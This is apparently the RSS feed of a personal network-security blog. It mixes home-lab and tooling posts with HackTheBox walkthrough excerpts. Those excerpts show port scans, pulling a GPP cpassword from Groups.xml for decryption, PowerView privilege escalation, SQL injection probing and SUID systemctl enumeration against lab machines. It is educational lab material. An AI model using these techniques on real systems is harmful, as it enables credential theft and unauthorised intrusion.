<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Posts on rchitect</title><link>https://www.rchitect.in/posts/</link><description>Recent content in Posts on rchitect</description><generator>Hugo</generator><language>en</language><lastBuildDate>Mon, 24 Aug 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://www.rchitect.in/posts/index.xml" rel="self" type="application/rss+xml"/><item><title>Closing the Blind Spots: Access Points, Cameras, and a Self-Hosted Media Server</title><link>https://www.rchitect.in/posts/home-network-part-2/</link><pubDate>Mon, 24 Aug 2026 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/home-network-part-2/</guid><description>&lt;p&gt;In the &lt;a href="https://www.rchitect.in/posts/home-network-firewall-setup/" &gt;first part of this series&lt;/a&gt;, I put a Sophos XGS firewall inline on my home network in bridge mode — log-only, no blocking — just to &lt;em&gt;see&lt;/em&gt; what was actually crossing the wire. That post ended on an unfinished note: both Wi-Fi radios in the house sat outside the monitored path, so every wireless device was still invisible to the firewall. I&amp;rsquo;d picked an Omada access point to fix it, but hadn&amp;rsquo;t yet proven it would actually do the job.&lt;/p&gt;</description></item><item><title>Building a Comprehensive Network Security Lab: From VMware to Cloud Integration</title><link>https://www.rchitect.in/posts/network-security-lab/</link><pubDate>Fri, 10 Jul 2026 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/network-security-lab/</guid><description>&lt;p&gt;After 17 years in IT and countless production deployments, I&amp;rsquo;ve learned that having a proper lab environment isn&amp;rsquo;t just helpful—it&amp;rsquo;s essential. Whether you&amp;rsquo;re testing new Palo Alto policies, validating Zscaler configurations, or experimenting with zero trust architectures, a well-designed lab saves you from career-limiting moves in production.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;ve built and rebuilt my lab several times over the years, learning hard lessons about what works and what doesn&amp;rsquo;t. Here&amp;rsquo;s how to build a comprehensive network security lab that actually mirrors real-world scenarios.&lt;/p&gt;</description></item><item><title>Turning My Home Network Into a Lab: Deploying a Sophos XGS Firewall Behind a Regular ISP Router</title><link>https://www.rchitect.in/posts/home-network-firewall-setup/</link><pubDate>Fri, 10 Jul 2026 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/home-network-firewall-setup/</guid><description>&lt;p&gt;I&amp;rsquo;ve spent over a decade doing this professionally — Palo Alto, Zscaler, Netskope, Illumio, the whole stack — mostly in enterprise environments with clean topologies, dedicated racks, and someone else worrying about the power bill. So when I decided to bring real visibility into my own home network, I expected it to be a quick weekend project.&lt;/p&gt;
&lt;p&gt;It wasn&amp;rsquo;t. And honestly, that&amp;rsquo;s exactly why I&amp;rsquo;m writing this post.&lt;/p&gt;
&lt;p&gt;Home networks — and small offices, and shop floors — are messy in a very specific way that enterprise networks aren&amp;rsquo;t. You don&amp;rsquo;t get to choose where the ISP terminates. You don&amp;rsquo;t get to run structured cabling through a wall you&amp;rsquo;re not allowed to drill. You inherit a topology built for convenience, not security, and then you&amp;rsquo;re asked to bolt real monitoring onto it without breaking anyone&amp;rsquo;s Netflix. If you do freelance or consulting work for small offices and retail shops, this is &lt;em&gt;precisely&lt;/em&gt; the kind of constraint you&amp;rsquo;ll run into far more often than a textbook enterprise design.&lt;/p&gt;</description></item><item><title>Claude Code Complete Setup Guide: Terminal-Native AI for Network Security Automation</title><link>https://www.rchitect.in/posts/claude-code-setup/</link><pubDate>Sat, 21 Mar 2026 15:17:38 +0530</pubDate><guid>https://www.rchitect.in/posts/claude-code-setup/</guid><description>&lt;p&gt;After years of using browser-based AI tools for network security documentation and automation scripts, I&amp;rsquo;ve found Claude Code to be a game-changer. Unlike the web interface, it runs natively in your terminal with direct file system access and can actually execute tasks on your local machine.&lt;/p&gt;
&lt;p&gt;For network engineers dealing with firewall configs, automation scripts, and documentation, this setup transforms how you interact with AI. Instead of copying code snippets back and forth, Claude can read your actual config files, modify them, and even control browsers for testing.&lt;/p&gt;</description></item><item><title>n8n vs Antigravity: Choosing the Right Automation Tool for Network Security Operations</title><link>https://www.rchitect.in/posts/n8n-vs-antigravity-tool/</link><pubDate>Sat, 21 Mar 2026 14:12:36 +0530</pubDate><guid>https://www.rchitect.in/posts/n8n-vs-antigravity-tool/</guid><description>&lt;p&gt;After spending over a decade automating network security operations, I&amp;rsquo;ve evaluated numerous workflow automation platforms. Two tools that frequently come up in discussions are n8n and Antigravity. Both promise to streamline operations, but they serve distinctly different purposes and audiences. Let me break down the key differences based on my hands-on experience implementing automation solutions across enterprise environments.&lt;/p&gt;
&lt;h2 id="understanding-the-fundamental-differences"&gt;
 Understanding the Fundamental Differences
 &lt;a class="heading-link" href="#understanding-the-fundamental-differences"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;n8n is an open-source workflow automation tool that focuses on connecting different services and APIs through visual workflows. It&amp;rsquo;s designed for technical teams who want to build custom automation without extensive coding knowledge. Antigravity, on the other hand, is a specialized platform primarily used for data pipeline management and ETL operations, particularly in analytics and business intelligence contexts.&lt;/p&gt;</description></item><item><title>How to create IPS profiles like DDOS protection in BIG IP F5</title><link>https://www.rchitect.in/posts/f5ips/</link><pubDate>Sat, 15 Feb 2025 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/f5ips/</guid><description>&lt;h1 id="how-to-create-ips-profiles-like-ddos-protection-in-big-ip-f5"&gt;
 How to create IPS profiles like DDOS protection in BIG IP F5
 &lt;a class="heading-link" href="#how-to-create-ips-profiles-like-ddos-protection-in-big-ip-f5"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;F5 has IPS feature which can be configured to prevent DOS attacks.&lt;/p&gt;
&lt;p&gt;Refer these tabs to explore these options:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/posts/f5ips/1.PNG" alt="f5ips"&gt;&lt;/p&gt;
&lt;p&gt;Additionally explore these options too&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/posts/f5ips/2.PNG" alt="f5ips"&gt;&lt;/p&gt;</description></item><item><title>Search option on static websites like Hugo using Pagefind</title><link>https://www.rchitect.in/posts/hugosearchoption/</link><pubDate>Tue, 04 Feb 2025 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/hugosearchoption/</guid><description>&lt;p&gt;This post is about implementing the search option on static websites like Hugo&lt;/p&gt;</description></item><item><title>Configuration and License missing after BIG IP upgrade</title><link>https://www.rchitect.in/posts/f5error/</link><pubDate>Sun, 26 Jan 2025 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/f5error/</guid><description>&lt;h1 id="the-device-is-not-operational-because-loaded-configuration-contains-error-or-unlicensed-objects"&gt;
 The device is not operational because loaded configuration contains error or unlicensed objects
 &lt;a class="heading-link" href="#the-device-is-not-operational-because-loaded-configuration-contains-error-or-unlicensed-objects"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h5 id="f5-upgrade-errors"&gt;
 F5 upgrade errors
 &lt;a class="heading-link" href="#f5-upgrade-errors"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;p&gt;During F5 Viprion device software upgrade there could be a chance that after the upgrade the configuration and license does not copy to newly rebooted hard sisk and show below error:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/posts/f5install/2.PNG" alt="f5error"&gt;&lt;/p&gt;
&lt;p&gt;To avoid this before upgrade you have to check the device configuration copy new new Hard disk option is enabled.
However few Viprion devices this option is graded out like this:&lt;/p&gt;</description></item><item><title>Github Commands</title><link>https://www.rchitect.in/posts/githubcommand/</link><pubDate>Thu, 16 Mar 2023 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/githubcommand/</guid><description>&lt;h1 id="useful-commands-in-github"&gt;
 Useful commands in Github
 &lt;a class="heading-link" href="#useful-commands-in-github"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;Refer some commands which can be useful while using github&lt;/p&gt;
&lt;h6 id="cloning-a-folder-or-directory-from-github-locally"&gt;
 Cloning a folder or directory from github locally
 &lt;a class="heading-link" href="#cloning-a-folder-or-directory-from-github-locally"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;p&gt;To clone this github folder on my Kali Linux.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/github/1.png" alt="github"&gt;&lt;/p&gt;
&lt;p&gt;On linux PC&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;─(rocky㉿kali)-[~]
└─$ cd gitrepos 
 
┌──(rocky㉿kali)-[~/gitrepos]
└─$ mkdir seclist 
 
┌──(rocky㉿kali)-[~/gitrepos]
└─$ cd seclist 
git clone https://github.com/danielmiessler/SecLists.git 128 ⨯
Cloning into &amp;#39;SecLists&amp;#39;...
remote: Enumerating objects: 12168, done.
remote: Counting objects: 100% (67/67), done.
remote: Compressing objects: 100% (41/41), done
&lt;/code&gt;&lt;/pre&gt;</description></item><item><title>Vulnhub DC-9</title><link>https://www.rchitect.in/posts/vulnhb-dc9/</link><pubDate>Thu, 16 Mar 2023 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/vulnhb-dc9/</guid><description>&lt;p&gt;This post is about the Walkthrough of the Vulnhub machine: DC-9&lt;/p&gt;</description></item><item><title>Hackthebox Forest</title><link>https://www.rchitect.in/posts/htb-forest/</link><pubDate>Wed, 30 Nov 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-forest/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Forest&lt;/p&gt;</description></item><item><title>gpp-decrypt for password de-crypt</title><link>https://www.rchitect.in/posts/gpp-decrypt/</link><pubDate>Thu, 15 Sep 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/gpp-decrypt/</guid><description>&lt;h1 id="usage-of-gpp-decrypt"&gt;
 Usage of gpp-decrypt
 &lt;a class="heading-link" href="#usage-of-gpp-decrypt"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;&amp;ldquo;gpp-decrypt&amp;rdquo; is a tool built of python3 which can be used for decrypting AD related passwords.&lt;/p&gt;
&lt;p&gt;During some of the active directory labs, I could see a &amp;ldquo;groups.xml&amp;rdquo; which contain the local admininistartor password in encrypted format. I have used the &amp;ldquo;gpp-decrypt&amp;rdquo; to decrypt the password.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&amp;gt; ls
 . D 0 Sat Jul 21 06:37:44 2018
 .. D 0 Sat Jul 21 06:37:44 2018
 Groups.xml A 533 Wed Jul 18 16:46:06 2018

 5217023 blocks of size 4096. 278651 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&amp;gt; get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&amp;gt; exit

┌──(rocky㉿kali)-[~/hckbox/Active-1/smb]
└─$ cat Groups.xml 
&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;utf-8&amp;#34;?&amp;gt;
&amp;lt;Groups clsid=&amp;#34;{3125E937-EB16-4b4c-9934-544FC6D24D26}&amp;#34;&amp;gt;&amp;lt;User clsid=&amp;#34;{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}&amp;#34; name=&amp;#34;active.htb\SVC_TGS&amp;#34; image=&amp;#34;2&amp;#34; changed=&amp;#34;2018-07-18 20:46:06&amp;#34; uid=&amp;#34;{EF57DA28-5F69-4530-A59E-AAB58578219D}&amp;#34;&amp;gt;&amp;lt;Properties action=&amp;#34;U&amp;#34; newName=&amp;#34;&amp;#34; fullName=&amp;#34;&amp;#34; description=&amp;#34;&amp;#34; cpassword=&amp;#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ&amp;#34; changeLogon=&amp;#34;0&amp;#34; noChange=&amp;#34;1&amp;#34; neverExpires=&amp;#34;1&amp;#34; acctDisabled=&amp;#34;0&amp;#34; userName=&amp;#34;active.htb\SVC_TGS&amp;#34;/&amp;gt;&amp;lt;/User&amp;gt;
&amp;lt;/Groups&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;h5 id="why-this-password-was-shown-in-this-folder"&gt;
 Why this password was shown in this folder:
 &lt;a class="heading-link" href="#why-this-password-was-shown-in-this-folder"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;p&gt;This was due to the Microsoft group policy preference. Due to this settings a sysvol is created with encrypted password of admin. More can be read &lt;a href="https://adsecurity.org/?p=2288" class="external-link" target="_blank" rel="noopener"&gt;here&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>Powerview usage for privilege escalation</title><link>https://www.rchitect.in/posts/powerview/</link><pubDate>Mon, 18 Jul 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/powerview/</guid><description>&lt;h1 id="powerview-script-usage-for-privilege-escalation"&gt;
 Powerview Script usage for privilege escalation
 &lt;a class="heading-link" href="#powerview-script-usage-for-privilege-escalation"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;Powerview script can be for enumeration and privilege escalation.&lt;/p&gt;
&lt;p&gt;The script can be downloaded from &lt;a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" class="external-link" target="_blank" rel="noopener"&gt;here.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I will explain few scenrios which i have used poweview for enumeration and privilege escalation. Most of times I will upload the file like this to windows( location C:\ProgramData)&lt;/p&gt;
&lt;p&gt;Make sure to activate the script by using below command&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Import-Module .\PowerView.ps1
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/powerview/1.png" alt="powerview"&gt;&lt;/p&gt;</description></item><item><title>Hackthebox Active</title><link>https://www.rchitect.in/posts/htb-active/</link><pubDate>Fri, 01 Jul 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-active/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Active&lt;/p&gt;</description></item><item><title>Hackthebox Object</title><link>https://www.rchitect.in/posts/htb-object/</link><pubDate>Thu, 30 Jun 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-object/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Object&lt;/p&gt;</description></item><item><title>Sql injection</title><link>https://www.rchitect.in/posts/sql-inection/</link><pubDate>Sat, 25 Jun 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/sql-inection/</guid><description>&lt;h1 id="sql-injection-methods"&gt;
 Sql Injection Methods
 &lt;a class="heading-link" href="#sql-injection-methods"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h6 id="how-to-identify-sql-injection"&gt;
 How to identify SQL injection
 &lt;a class="heading-link" href="#how-to-identify-sql-injection"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;p&gt;Refer below webpage( a smaple hotel reservation website) from the hackthebox machine.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/jarvis/5.png" alt="sql"&gt;&lt;/p&gt;
&lt;p&gt;I am going to add &amp;rsquo; and see if there are any erros.&lt;/p&gt;
&lt;p&gt;Actual url&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;http://10.10.10.143/room.php?cod=1
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/jarvis/6.png" alt="sql"&gt;&lt;/p&gt;
&lt;p&gt;SQL inection tested url&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;http://10.10.10.143/room.php?cod=1&amp;#39;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;There are no errors and the page seems broken. This gives hint for SQL injection vulnarability.&lt;/p&gt;</description></item><item><title>Port 139,445 SMB enumeration</title><link>https://www.rchitect.in/posts/smb-enumeration/</link><pubDate>Mon, 20 Jun 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/smb-enumeration/</guid><description>&lt;h1 id="smb-enumeration"&gt;
 SMB enumeration
 &lt;a class="heading-link" href="#smb-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;SMB is application layer protocol. This protocol is used for communication between PCs in same network. SMB mainly used for file transfer.&lt;/p&gt;
&lt;p&gt;Here we are going to explian the enumeration techniques can be used for SMB protocol. Firat the below scan confirm the nmap ports are open in a server or not.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.11.101
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-10 19:46 EDT
Nmap scan report for 10.10.11.101
Host is up (0.048s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Once we see 139,445 ( smb related ports) are open lets try to enumerate more at smb level.&lt;/p&gt;</description></item><item><title>Hackthebox Writer</title><link>https://www.rchitect.in/posts/htb-writer/</link><pubDate>Sat, 11 Jun 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-writer/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Writer&lt;/p&gt;</description></item><item><title>Hackthebox Previce</title><link>https://www.rchitect.in/posts/htb-previse/</link><pubDate>Wed, 08 Jun 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-previse/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Previce&lt;/p&gt;</description></item><item><title>Hackthebox Knife</title><link>https://www.rchitect.in/posts/htb-knife/</link><pubDate>Fri, 13 May 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-knife/</guid><description>&lt;h1 id="hackthebox-knife-walkthrough"&gt;
 Hackthebox Knife Walkthrough
 &lt;a class="heading-link" href="#hackthebox-knife-walkthrough"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h5 id="initial-enumeration"&gt;
 Initial Enumeration
 &lt;a class="heading-link" href="#initial-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;h6 id="port-scan"&gt;
 Port Scan
 &lt;a class="heading-link" href="#port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.242 127 ⨯
sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.242
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Nmap scan report for 10.10.10.242
Host is up (0.066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Warning: 10.10.10.242 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.242
Host is up (0.049s latency).
All 65535 scanned ports on 10.10.10.242 are open|filtered (65483) or closed (52)

Nmap done: 1 IP address (1 host up) scanned in 46.51 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h6 id="vulnarabilty-scan"&gt;
 Vulnarabilty Scan
 &lt;a class="heading-link" href="#vulnarabilty-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt; nmap -Pn -p 22,80 -sC -sV -oN details.txt 10.10.10.242
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:41 EDT
Nmap scan report for 10.10.10.242
Host is up (0.044s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h6 id="directory-scan"&gt;
 Directory Scan
 &lt;a class="heading-link" href="#directory-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;p&gt;Website Front end:&lt;/p&gt;</description></item><item><title>phpmyadmin 4.8 exploit</title><link>https://www.rchitect.in/posts/phpmyadmin-exploit/</link><pubDate>Thu, 28 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/phpmyadmin-exploit/</guid><description/></item><item><title>Systemctl privilege escalation</title><link>https://www.rchitect.in/posts/systemctl/</link><pubDate>Thu, 28 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/systemctl/</guid><description>&lt;h1 id="systemctl-suid-enabled-privilege-escalation"&gt;
 Systemctl (suid enabled) privilege escalation
 &lt;a class="heading-link" href="#systemctl-suid-enabled-privilege-escalation"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h5 id=""&gt;
 
 &lt;a class="heading-link" href="#"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;p&gt;Sceanrio: We have initial shell and during the checks we have found a systemctl file is enabled with SUID bit. refer below:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;find / -perm -u=s -type f 2&amp;gt;/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;As per checking GTFO site, its says as below&lt;/p&gt;</description></item><item><title>Hackthebox Jarvis</title><link>https://www.rchitect.in/posts/htb-jarvis/</link><pubDate>Mon, 25 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-jarvis/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Jarvis&lt;/p&gt;</description></item><item><title>Hackthebox Brainfuck</title><link>https://www.rchitect.in/posts/htb-brainfuck/</link><pubDate>Thu, 14 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-brainfuck/</guid><description>&lt;h1 id="hackthebox-brainfuck-walkthrough"&gt;
 Hackthebox Brainfuck Walkthrough
 &lt;a class="heading-link" href="#hackthebox-brainfuck-walkthrough"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/brainfuck/1.png" alt="brainfuck"&gt;&lt;/p&gt;
&lt;h3 id="initial-enumeration"&gt;
 Initial Enumeration
 &lt;a class="heading-link" href="#initial-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;h4 id="port-scan"&gt;
 Port Scan
 &lt;a class="heading-link" href="#port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.17 1 ⨯
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:40 EDT
Nmap scan report for 10.10.10.17
Host is up (0.051s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open https


$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.17 1 ⨯
HHost discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:41 EDT
Nmap scan report for 10.10.10.17
Host is up (0.045s latency).
Not shown: 65532 open|filtered ports
PORT STATE SERVICE
110/udp closed pop3
143/udp closed imap
443/udp closed https
&lt;/code&gt;&lt;/pre&gt;&lt;h5 id="vulnarability-scan"&gt;
 Vulnarability Scan
 &lt;a class="heading-link" href="#vulnarability-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;ocky㉿kali)-[~/hckbox/node]
└─$ nmap -Pn -p 22,25,110,143,443 -sC -sV -oN details.txt 10.10.10.17 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:43 EDT
